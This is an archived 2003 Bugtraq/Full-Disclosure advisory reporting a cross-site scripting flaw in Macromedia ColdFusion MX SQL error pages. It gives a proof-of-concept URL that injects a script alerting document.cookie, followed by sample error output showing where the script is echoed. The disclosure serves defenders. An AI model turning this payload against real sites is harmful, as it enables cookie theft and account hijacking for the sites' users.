[32079] in bugtraq
ColdFusion SQL Error Pages XSS
daemon@ATHENA.MIT.EDU (Lorenzo Hernandez Garcia-Hierro)
Wed Oct 15 17:58:39 2003
Message-ID: <017001c3935d$8259f140$050010ac@Estila>
From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh@nsrg-security.com>
To: "Full-Disclosure" <full-disclosure@lists.netsys.com>
Cc: "BUGTRAQ" <bugtraq@securityfocus.com>
Date: Wed, 15 Oct 2003 22:36:34 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
----------
NOTE ABOUT COLDFUSION XSS ATTACKS
_______
Vendor: Macromedia
Versions: MX ( 6.0 ) tested , older ?
_______
PROBLEM:
When you access to an error page of sql you can insert xss code to be shown
in the error uotput of the sql backend.
example:
http://[target]/article.cfm?id=1'<script>alert(document.cookie);</script>
the output:
Error Occurred While Processing Request
Error Diagnostic Information
[SQL SERVER] Error Code = code
SQL SERVER-XXXX: SQL command not properly ended
SQL = "SELECT article AS articleID FROM articlesnews WHERE newsID =
1'[HERE COMES THE XSS THAT IS EXECUTED]
Data Source = "XXXXXXXXXXXXXXXXXXXXXX"
The error occurred while processing an element with a general
identifier of (CFQUERY), occupying document position (7:2) to (7:58) in the
template file /xxxxxxxxxxxxxxxxxxxx/articles.cfm.
Date/Time: Moof 2003
Browser: Browserio
Remote Address: xxx.xxx.xxx.xxx
Query String: id=1'[again executed the xss attack]
Please inform the site administrator that this error has occurred (be sure
to include the contents of this page in your message to the administrator).
-----
CONTACT INFO:
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->/* not csh but sh */
0x02->$ PATH=pretending!/usr/ucb/which sense
0x03-> no sense in pretending!
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
No Secure Root Group Security Research Team
http://www.nsrg-security.com
______________________
